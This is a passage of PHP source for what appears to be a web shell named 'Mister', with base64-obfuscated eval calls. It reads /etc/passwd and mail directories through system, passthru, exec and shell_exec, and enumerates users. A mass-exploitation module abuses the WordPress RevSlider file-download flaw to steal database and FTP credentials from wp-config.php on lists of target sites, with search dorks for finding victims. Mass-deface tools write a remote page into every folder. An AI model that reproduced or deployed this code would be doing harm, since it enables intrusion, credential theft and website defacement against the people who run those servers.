  1912. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1913. $SERVERIP1 = "SERVER IP :";
  1914. echo ''. $SERVERIP1 .'' ;
  1915. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1916. $SPAN3 = "</span>";
  1917. echo ''. $SPAN2 .'' ;
  1918. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1919. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1920. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1921. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1922. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1923. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1924. $HOSTOWNED1 = "HOST OWNED :";
  1925. echo ''. $HOSTOWNED1 .'' ;
  1926. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1927. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1928. echo ''. $REPORTERROR .'</a></span></footer>';
  1929. echo ''. $THEEND .'' ;
  1930. exit ;}
  1931. ////////////////// BYPASS
  1932. if ($_GET["Mister"] == "Bypassuser"){
  1933. //////// FOOTER
  1934. $FOTTER2 = "<footer class='MK-footer'>";  
  1935. echo ''. $FOTTER2 .'' ;
  1936. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  1937. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  1938. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1939. $SERVERIP1 = "SERVER IP :";
  1940. echo ''. $SERVERIP1 .'' ;
  1941. $SPAN2 = "<span style='color:#FFFFFF;'>";
  1942. $SPAN3 = "</span>";
  1943. echo ''. $SPAN2 .'' ;
  1944. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  1945. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1946. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  1947. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  1948. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  1949. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  1950. $HOSTOWNED1 = "HOST OWNED :";
  1951. echo ''. $HOSTOWNED1 .'' ;
  1952. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  1953. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  1954. echo ''. $REPORTERROR .'</a></span></footer>';
  1955. echo ''. $THEEND .'' ;
  1956. echo '<br><center><nav class="social"><ul>
  1957. <li><a href="?Mister=Bypassuser"> Bypass Users Server</a></li>
  1958. <li><a href="?Mister=Bypassetc" >Bypass /etc/passwd </a></li>
  1959. </ul></nav></center>';
  1960. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>BYPASS USERS SERVER </span></nav><br><div class=content><center>";
  1961. echo '
  1962. <div><span style="font-size:11px;  color:#0078FF">
  1963. <p><center><span style="font-size:11px;  color:#0078FF">BYPASS WITH AWK PROGRAM
  1964. <form method="post">
  1965. <input type="submit" value="Bypass" name="awk" class="Mister-button">
  1966. </form>
  1967. </center><br>
  1968. </p>
  1969. <p><center><span style="font-size:11px;  color:#0078FF">BYPASS WITH SYSTEM FUNCTION
  1970. <form method="post">
  1971. <input type="submit" value="Bypass" name="syst" class="Mister-button">
  1972. </form>
  1973. </center><br>
  1974. </p>
  1975. <p><center><span style="font-size:11px;  color:#0078FF">BYPASS WITH PASSTHRU FUNCTION
  1976. <form method="post">
  1977. <input type="submit" value="Bypass" name="passth" class="Mister-button">
  1978. </form>
  1979. </center><br>
  1980. </p>
  1981. <p><center><span style="font-size:11px;  color:#0078FF">BYPASS WITH EXEC FUNCTION
  1982. <form method="post">
  1983. <input type="submit" value="Bypass" name="ex" class="Mister-button">
  1984. </form>
  1985. </center><br>
  1986. </p>
  1987. <p><center><span style="font-size:11px;  color:#0078FF">BYPASS WITH SHELL_EXEC FUNCTION
  1988. <form method="post">
  1989. <input type="submit" value="Bypass" name="shex" class="Mister-button">
  1990. </form>
  1991. </center><br>
  1992. </p><center>';
  1993. //Awk Program //
  1994. if ($_POST['awk']) {
  1995. echo"<textarea cols='65' rows='15' style='width:60%'>";
  1996. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  1997. echo "</textarea><br>";
  1998. echo "
  1999. <br>
  2000. </b>
  2001. <br>
  2002. ";
  2003. }
  2004. echo "</center><center>";
  2005. //SYSTEM FUNCTION
  2006. if ($_POST['syst']) {
  2007. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2008. echo system("ls /var/mail");
  2009. echo "</textarea><br>";
  2010. echo "
  2011. <br>
  2012. </b>
  2013. <br>
  2014. ";
  2015. }
  2016. echo "</center><center>";
  2017. //PASSTHRU FUNCTION
  2018. if ($_POST['passth']) {
  2019. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2020. echo passthru("ls /var/mail");
  2021. echo "</textarea><br>";
  2022. echo "
  2023. <br>
  2024. </b>
  2025. <br>
  2026. ";
  2027. }
  2028. echo "</center><center>";
  2029. //exec Function
  2030. if ($_POST['ex']) {
  2031. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2032. echo exec("ls /var/mail");
  2033. echo "</textarea><br>";
  2034. echo "
  2035. <br>
  2036. </b>
  2037. <br>
  2038. ";
  2039. }
  2040.  
  2041. echo "</center><center>";
  2042.    
  2043. //exec Function //
  2044. if ($_POST['shex']) {
  2045. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2046. echo shell_exec("ls /var/mail");
  2047. echo "</textarea><br>";
  2048. echo "
  2049. <br>
  2050.  
  2051. </b>
  2052. <br>
  2053. ";
  2054. } exit ;}
  2055. /////////////// BYPASS 2
  2056. if ($_GET["Mister"] == "Bypassetc"){
  2057. echo '<br><center><nav class="social"><ul>
  2058. <li><a href="?Mister=Bypassuser"> Bypass Users Server</a></li>
  2059. <li><a href="?Mister=Bypassetc" >Bypass /etc/passwd </a></li>
  2060. </ul></nav></center>';
  2061. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>BYPASS /ETC/PASSWD </span></nav><center><br><div class=content>";
  2062. echo '
  2063. <p><center><span style="font-size:11px;  color:#0078FF">Bypass with System Function
  2064. <form method="post">
  2065. <input type="submit" value="Bypass" name="syst" class="Mister-button">
  2066. </form>
  2067. </center><br>
  2068. </p>
  2069.  
  2070. <p><center><span style="font-size:11px;  color:#0078FF">Bypass with Passthru Function
  2071. <form method="post">
  2072. <span style="font-size:11px;  color:#0078FF">
  2073. <input type="submit" value="Bypass" name="passth" class="Mister-button">
  2074. </form>
  2075. </center><br>
  2076. </p>
  2077.  
  2078. <p><center><span style="font-size:11px;  color:#0078FF">Bypass with exec Function
  2079. <form method="post">
  2080. <input type="submit" value="Bypass" name="ex" class="Mister-button">
  2081. </form>
  2082. </center><br>
  2083. </p>
  2084.  
  2085. <p><center><span style="font-size:11px;  color:#0078FF">Bypass with shell_exec Function
  2086. <form method="post">
  2087. <input type="submit" value="Bypass" name="shex" class="Mister-button">
  2088. </form>
  2089. </center><br>
  2090. </p>
  2091.  
  2092. <p><center><span style="font-size:11px;  color:#0078FF">Bypass with posix_getpwuid Function
  2093. <form method="post">
  2094. <input type="submit" value="Bypass" name="Mister" class="Mister-button">
  2095. </form>
  2096. </center><br>
  2097. </p>
  2098. <center>';
  2099. //System Function //
  2100. if($_POST['syst'])
  2101. {
  2102. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2103. echo system("cat /etc/passwd");
  2104. echo"</textarea><br>";
  2105. echo"
  2106. <br>
  2107.  
  2108. </b>
  2109. <br>
  2110. ";
  2111. }
  2112. echo '
  2113. </center>
  2114. <center>';
  2115. //Passthru Function //
  2116. if($_POST['passth'])
  2117. {
  2118. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2119. echo passthru("cat /etc/passwd");
  2120. echo"</textarea><br>";
  2121. echo"
  2122. <br>
  2123. </b>
  2124. <br>
  2125. ";
  2126. }
  2127. echo '
  2128. </center>
  2129. <center>';
  2130. //exec Function //
  2131. if($_POST['ex'])
  2132. {
  2133. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2134. echo exec("cat /etc/passwd");
  2135. echo"</textarea><br>";
  2136. echo"
  2137. <br>
  2138. </b>
  2139. <br>
  2140. ";
  2141. }
  2142. echo '
  2143. </center>
  2144. <center>';
  2145. //exec Function //
  2146. if($_POST['shex'])
  2147. {
  2148. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2149. echo shell_exec("cat /etc/passwd");
  2150. echo"</textarea><br>";
  2151. echo"
  2152. <br>
  2153.  
  2154. </b>
  2155. <br>
  2156. ";
  2157. }
  2158. echo '</center>
  2159. <center>';
  2160.    
  2161.  
  2162.  
  2163. //posix_getpwuid Function //
  2164. if($_POST['Mister'])
  2165. {
  2166. echo"<textarea cols='65' rows='15' style='width:60%'>";
  2167. for($uid=0;$uid<60000;$uid++){
  2168. $ara = posix_getpwuid($uid);
  2169. if (!empty($ara)) {
  2170. while (list ($key, $val) = each($ara)){
  2171. print "$val:";
  2172. }
  2173. print "\n";
  2174. }
  2175. }
  2176. echo"</textarea><br>";
  2177. }
  2178. $FOTTER2 = "<footer class='MK-footer'>";  
  2179. echo ''. $FOTTER2 .'' ;
  2180. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2181. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2182. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2183. $SERVERIP1 = "SERVER IP :";
  2184. echo ''. $SERVERIP1 .'' ;
  2185. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2186. $SPAN3 = "</span>";
  2187. echo ''. $SPAN2 .'' ;
  2188. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2189. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2190. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2191. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2192. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2193. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2194. $HOSTOWNED1 = "HOST OWNED :";
  2195. echo ''. $HOSTOWNED1 .'' ;
  2196. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2197.  
  2198.  
  2199. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2200. echo ''. $REPORTERROR .'</a></span></footer>';
  2201. echo ''. $THEEND .'' ;
  2202. exit ;}
  2203. //////////// READ
  2204. if ($_GET["Mister"] == "read"){
  2205. echo "<br><center><nav class='social'><ul>
  2206. <li><a href='?Mister=read'>Read /Etc/Passwd</a></li>
  2207. <li><a href='?Mister=EtcExtract'> ExtracT Users From /etc/passwd</a></li>
  2208. <li><a href='?Mister=Cms'>Cms Scanner</a></li>
  2209. </ul></nav></center>";
  2210. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>READ /ETC/PASSWD</span></nav><center>";
  2211. echo "<br><div class=content><form method='post' action='?Mister=read&save=1'><textarea cols='50' rows='10' name='file' class='input'  style='height:100px;width:40%;'>";
  2212. flush();
  2213. flush();
  2214. $file = '/etc/named.conf';
  2215.  
  2216. $w0co = @fopen($file, 'r');
  2217. if ($w0co){
  2218. $content = @fread($w0co, @FILESIZE($file));
  2219. echo "".htmlentities($content)."";
  2220. }
  2221. else if (!$w0co)
  2222. {
  2223. $w0co = @show_source($file) ;
  2224. }
  2225. else if (!$w0co)
  2226. {
  2227. $w0co = @highlight_file($file);
  2228. }
  2229. else if (!$w0co)
  2230. {
  2231. $sm = @symlink($file,'MISTER.txt');
  2232.  
  2233.  
  2234. if ($sm){
  2235. $w0co = @fopen('named.txt', 'r');
  2236. $content = @fread($w0co, @FILESIZE($file));
  2237. echo "".htmlentities($content)."";
  2238. }
  2239. }
  2240. echo "</textarea><br><br><input  type='submit' value='SAVE' class='Mister-button'></form><br><br>";
  2241. if(isset($_GET['save'])){
  2242. $cont = stripcslashes($_POST['file']);
  2243. $f = fopen('named.txt','w');
  2244. $w = fwrite($f,$cont);
  2245. if($w){
  2246. echo '<span style="font-size:11px;  color:#0078FF">SAVE HAS BEEN SUCCESSFULLY </span>';
  2247. }
  2248. fclose($f);
  2249. }
  2250. ///// FOOTER
  2251. $FOTTER2 = "<footer class='MK-footer'>";  
  2252. echo ''. $FOTTER2 .'' ;
  2253. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2254. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2255. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2256. $SERVERIP1 = "SERVER IP :";
  2257. echo ''. $SERVERIP1 .'' ;
  2258. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2259. $SPAN3 = "</span>";
  2260. echo ''. $SPAN2 .'' ;
  2261. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2262. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2263. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2264. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2265. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2266. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2267. $HOSTOWNED1 = "HOST OWNED :";
  2268. echo ''. $HOSTOWNED1 .'' ;
  2269. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2270.  
  2271.  
  2272. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2273. echo ''. $REPORTERROR .'</a></span></footer>';
  2274. echo ''. $THEEND .'' ;
  2275. exit ;
  2276. }
  2277. ////// REVSLIDE
  2278. if ($_GET["Mister"] == "Rev"){
  2279. echo "<br><center><nav class='social'><ul>
  2280. <li><a href='?Mister=FinderAdmin'>Finder Administer Panel V1.0</a></li>
  2281. <li><a href='?Mister=Domains'>Get All Domains</a></li>
  2282. <li><a href='?Mister=Finder'>Finder Database Panel</a></li>
  2283. <li><a href='?Mister=Getip'>Get Ip 2 Domains </a></li>
  2284. <li><a href='?Mister=subdomain'>Subdomain Checker</a></li>
  2285. <li><a href='?Mister=iplookdom'>Ip Lookup Reverse</a></li>
  2286. <li><a href='?Mister=Rev'>Mass Read Config </a></li>
  2287. <li><a href='?Mister=Grabber'>Grabber Config Attack</a></li>
  2288. <li><a href='?Mister=J-Scann3r'>Joomla Serv3r Scann3r</a></li>
  2289. <li><a href='?Mister=whois'>Website Whois</a></li>
  2290. </ul></nav></center>";
  2291. echo "<nav class='Mister-nav'><center><span style='font-size:18px;  color:#0078FF'>WORDPRESS READ CONFIG </span></nav><br><div class=content><center>";
  2292. echo "
  2293. <center><span style=' color:white' >Dork : </span></center>
  2294. <center><span> intext:Powered by Revslider </span> <br>
  2295. <span> inurl:plugins/revslider/ </span> </center>";
  2296. //////////////////// EXEMPLET
  2297. echo"<form method='post' name='login'>
  2298. <br><center><span style=' color:white' >List Url : </span><br></center>
  2299. <textarea name='sites' cols='10' rows='10' class='input' style='height:150px; width:50%;'>
  2300. http://www.Exemple.com\nhttp://www.Exemple.com\nhttp://www.Exemple.com\nhttp://www.Exemple.com</textarea>
  2301. <br>
  2302. <center><br><input type='submit' value='Read Config' name='go' class='Mister-button'><center>
  2303. </form><span>
  2304. ";
  2305. function findit($mytext,$starttag,$endtag) {
  2306.  $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
  2307.  $posRight = stripos($mytext,$endtag,$posLeft+1);
  2308.  return  substr($mytext,$posLeft,$posRight-$posLeft);
  2309. }
  2310. error_reporting(0);
  2311. set_time_limit(0);
  2312. $ya=$_POST['go'];
  2313. $co=$_POST['sites'];
  2314.  
  2315. if($ya){
  2316.  $e=explode("\r\n",$co);
  2317.  foreach($e as $bda){
  2318. echo '<br>'.$bda;
  2319.     $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  2320.     $dn=($bda).($linkof);
  2321.     $file=@file_get_contents($dn);
  2322.     if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  2323.     echo"<center><span style='font-size:11px;color:#0078FF'><b>&check; Infected ! </b></span></center>";
  2324.     echo "<center><font  color='white' >".$bda."</font></center>";
  2325.     echo "<span style='font-size:11px;  color:lime'>DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
  2326.     echo "<span style='font-size:11px;  color:lime'>DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
  2327.     echo "<span style='font-size:11px;  color:lime'>DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
  2328.     echo "<span style='font-size:11px;  color:lime'>DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
  2329.     }
  2330.     elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
  2331.     echo'<center>++++++++++++++++++++++++++++++++++++++</center>';
  2332.     echo"<center><span style='font-size:11px;  color:#0078FF'><b>&check; Infected ! </b></span></center>";    
  2333.     echo "<center><span style='font-size:11px;  color:white'>".$bda."</span></center>";
  2334.     echo "<span style='font-size:11px;  color:lime'>FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
  2335.     echo "<span style='font-size:11px;  color:lime'>FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
  2336.     echo "<span style='font-size:11px;  color:lime'>FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
  2337.     }
  2338.     else{
  2339.     echo'<center>++++++++++++++++++++++++++++++++++++++</center>';    
  2340.     echo "<center><p style='text-align: center;'>&check; <span color=white>".$bda."</span> ? </font><span style='font-size:11px;  color:red'>? ERUR :'(</span></center>";}
  2341.     echo'<center>++++++++++++++++++++++++++++++++++++++</center>';
  2342.  }
  2343.  
  2344. }
  2345.  
  2346. if(isset($site)){
  2347.  
  2348. foreach($list as $path => $test) {
  2349. $ch = curl_init();
  2350. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2351. curl_setopt($ch, CURLOPT_HEADER, 1);
  2352. curl_setopt($ch, CURLOPT_URL, $site.$test);
  2353. $result = curl_exec($ch);
  2354. curl_close($ch);
  2355. //print $url;
  2356. if (preg_match("/200 OK/", $result)){
  2357. echo "<br /><span style='font-size:11px;  color:green'>[+]</span><span style='font-size:11px;  color:#0078FF'> Found ? </font><span style='font-size:11px;  color:white'><a>[ $site$test ]</A></span></b>";
  2358. }
  2359. else if (preg_match("/401 Unauthorized/", $result)) {
  2360. echo "<br /><span style='font-size:11px;  color:#ffa71c'>[!]</span><span style='font-size:11px;  color:#0078FF'> Found ? </font><span style='font-size:11px;  color:white'><a>[ $site$test ]</A></font><a>[ $site$test ]</A></span></b>";
  2361. echo "<br /><span style='font-size:11px;  color:#0078FF'>[-]</span><span style='font-size:11px;  color:#0078FF'> Nothing Found On </span><span style='font-size:11px;  color:white'><a>[ $site$test ]</A></span><a>[$site$test]</a></span>";
  2362. }
  2363. }
  2364. }
  2365. echo "<br>";$FOTTER2 = "<footer class='MK-footer'>";  
  2366. echo ''. $FOTTER2 .'' ;
  2367. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2368. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2369. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2370. $SERVERIP1 = "SERVER IP :";
  2371. echo ''. $SERVERIP1 .'' ;
  2372. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2373. $SPAN3 = "</span>";
  2374. echo ''. $SPAN2 .'' ;
  2375. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2376. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2377. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2378. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2379. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2380. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2381. $HOSTOWNED1 = "HOST OWNED :";
  2382. echo ''. $HOSTOWNED1 .'' ;
  2383. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2384.  
  2385.  
  2386. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2387. echo ''. $REPORTERROR .'</a></span></footer>';
  2388. echo ''. $THEEND .'' ;
  2389. exit;}
  2390. //////////// THE MASS DEFACE
  2391. if ($_GET['Mister'] == 'Mass') {
  2392. echo "<br><center><nav class='social'><ul>
  2393. <li><a href='?Mister=Mass'> Mass Deface All Folder</a></li>
  2394. <li><a href='?Mister=Mass_up'> Mass Upload Deface in All Folder</a></li>
  2395. </ul></nav></center>";
  2396. echo "<nav class='Mister-nav'><center><span style='font-size:18px;color:#0078FF'>MASS DEFACE ALL FOLDER</span></nav><br><div class=content>
  2397. <center><span style=' color:#FFFFFF'>EX : </span>HTTP://TARGET.COM/INDEX.PHP
  2398. <center>";
  2399. echo "<span style=' color:#FFFFFF'>";
  2400. $defaceurl = $_POST['massdefaceurl'];
  2401. $dir = $_POST['massdefacedir'];
  2402. echo $dir."\n";
  2403. if (is_dir($dir)) {
  2404. if ($dh = opendir($dir)) {
  2405. while (($file = readdir($dh)) !== false) {
  2406. if(filetype($dir.$file)=="dir"){
  2407. $newfile=$dir.$file."/index.php";
  2408. echo "<br>";
  2409. echo $newfile."\n";
  2410. if (!copy($defaceurl, $newfile)) {
  2411. echo "<span style='color:#f60000'>FAILED TO COPY </span><span style='color:#0078FF;'>$file...</span>\n";
  2412. }
  2413. }
  2414. }
  2415. closedir($dh);
  2416. }
  2417. }
  2418. echo "<br>";eval("?>".base64_decode
  2419. ("PGZvcm0gYWN0aW9uPSc8P3BocCBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+JyBtZXRob2Q9J3Bvc3QnPg0KPHNwYW4+DQpbK10gTUFJTiBESVJFQ1RPUlk6PC9zcGFuPjxicj48aW5wdXQgdHlwZT0ndGV4dCcgc3R5bGU9J3dpZHRoOjQwJScgdmFsdWU9Jzw/cGhwICBlY2hvIGdldGN3ZCgpIC4gIi8iOyA/PicgbmFtZT0nbWFzc2RlZmFjZWRpcicgY2xhc3M9J2lucHV0Jz4="));
  2420. echo "<br><span><br>[+] DEFACEMENT URL: </span><br><input type='text' style='width:250px' name='massdefaceurl' placeholder='http://www.exemple.com/Deface.php' class='input'><br><br>
  2421. <input type='submit' name='execmassdeface' value='DEFACE IT' class='Mister-button' required></form></td>";
  2422.         echo '<br><br>';
  2423.         //// Footer
  2424. $FOTTER2 = "<footer class='MK-footer'>";  
  2425. echo ''. $FOTTER2 .'' ;
  2426. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2427. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2428. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2429. $SERVERIP1 = "SERVER IP :";
  2430. echo ''. $SERVERIP1 .'' ;
  2431. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2432. $SPAN3 = "</span>";
  2433. echo ''. $SPAN2 .'' ;
  2434. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
  2435. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2436. $CLIENTIP1 = "CLIENT IP :"; echo ''. $CLIENTIP1 .'';
  2437. echo ''. $SPAN2 .'' ; echo $_SERVER['REMOTE_ADDR'];
  2438. echo ''. $SPAN3 .'</button><button class="MK-Bouton">';
  2439. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2440. $HOSTOWNED1 = "HOST OWNED :";
  2441. echo ''. $HOSTOWNED1 .'' ;
  2442. echo ''. $SPAN2 .'' ; echo $_SERVER['SERVER_NAME'] ; echo ''. $SPAN3 .'</button> ';
  2443. $REPORTERROR = "|  ALL RIGHT RESERVED™ |";
  2444. echo ''. $REPORTERROR .'</a></span></footer>';
  2445. echo ''. $THEEND .'' ;
  2446. exit;}
  2447. //////////// THE MASS DEFACE2
  2448. if ($_GET['Mister'] == 'Mass_up') {
  2449. echo "<br><center><nav class='social'><ul>
  2450. <li><a href='?Mister=Mass'> Mass Deface All Folder</a></li>
  2451. <li><a href='?Mister=Mass_up'> Mass Upload Deface in All Folder</a></li>
  2452. </ul></nav></center>";
  2453. echo "<nav class='Mister-nav'><center><span style='font-size:18px;color:#0078FF'>MASS UPLOAD DEFACE IN ALL FOLDER</span></nav><br><div class=content>
  2454. <center><span style=' color:#FFFFFF'>EX : </span>HTTP://TARGET.COM/MK.PHP
  2455. <center>";
  2456. echo "<span style=' color:#FFFFFF'>";
  2457. $defaceurl = $_POST['massdefaceurl'];
  2458. $dir = $_POST['massdefacedir'];
  2459. echo $dir."\n";
  2460. if (is_dir($dir)) {
  2461. if ($dh = opendir($dir)) {
  2462. while (($file = readdir($dh)) !== false) {
  2463. if(filetype($dir.$file)=="dir"){
  2464. $newfile=$dir.$file."/MK.php";
  2465. echo "<br>";
  2466. echo $newfile."\n";
  2467. if (!copy($defaceurl, $newfile)) {
  2468. echo "<span style='color:#f60000'>FAILED TO COPY </span><span style='color:#0078FF;'>$file...</span>\n";
  2469. }
  2470. }
  2471. }
  2472. closedir($dh);
  2473. }
  2474. }
  2475. echo "<br>";eval("?>".base64_decode
  2476. ("PGZvcm0gYWN0aW9uPSc8P3BocCBiYXNlbmFtZSgkX1NFUlZFUlsnUEhQX1NFTEYnXSk7ID8+JyBtZXRob2Q9J3Bvc3QnPg0KPHNwYW4+DQpbK10gTUFJTiBESVJFQ1RPUlk6PC9zcGFuPjxicj48aW5wdXQgdHlwZT0ndGV4dCcgc3R5bGU9J3dpZHRoOjQwJScgdmFsdWU9Jzw/cGhwICBlY2hvIGdldGN3ZCgpIC4gIi8iOyA/PicgbmFtZT0nbWFzc2RlZmFjZWRpcicgY2xhc3M9J2lucHV0Jz4="));
  2477. echo "<br><span><br>[+] DEFACEMENT URL: </span><br><input type='text' style='width:250px' name='massdefaceurl' placeholder='http://www.exemple.com/Deface.php' class='input'><br><br>
  2478. <input type='submit' name='execmassdeface' value='UP DEFACE!' class='Mister-button' required></form></td>";
  2479.         echo '<br><br>';
  2480.         //// Footer
  2481. $FOTTER2 = "<footer class='MK-footer'>";  
  2482. echo ''. $FOTTER2 .'' ;
  2483. $COPYRIGHT1 = base64_decode("Q09QWVJJR0hUIMKpIDxhIGhyZWY9Jz9NaXN0ZXI9QWJvdXRzJz4gMjAxNSA8L2E+IHw=");
  2484. echo ''. $COPYRIGHT1 .'<button class="MK-Bouton">' ;
  2485. eval("?>".base64_decode ("PHNwYW4gc3R5bGU9J2NvbG9yOiMwMDc4RkYnPiDinrIgPC9zcGFuPg==/"));
  2486. $SERVERIP1 = "SERVER IP :";
  2487. echo ''. $SERVERIP1 .'' ;
  2488. $SPAN2 = "<span style='color:#FFFFFF;'>";
  2489. $SPAN3 = "</span>";
  2490. echo ''. $SPAN2 .'' ;
  2491. echo $SERVERIP = gethostbyname($_SERVER["HTTP_HOST"]); echo ''. $SPAN3 .'' ;
